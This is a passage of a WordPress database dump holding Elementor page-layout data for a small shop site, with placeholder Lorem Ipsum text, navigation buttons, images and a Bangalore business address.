Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(7947,1412,'_elementor_page_assets','a:0:{}'),(7952,1414,'_elementor_edit_mode','builder'),(7953,1414,'_elementor_template_type','wp-page'),(7954,1414,'_elementor_version','3.7.6'),(7955,1414,'_wp_page_template','elementor_canvas'),(7956,1414,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: 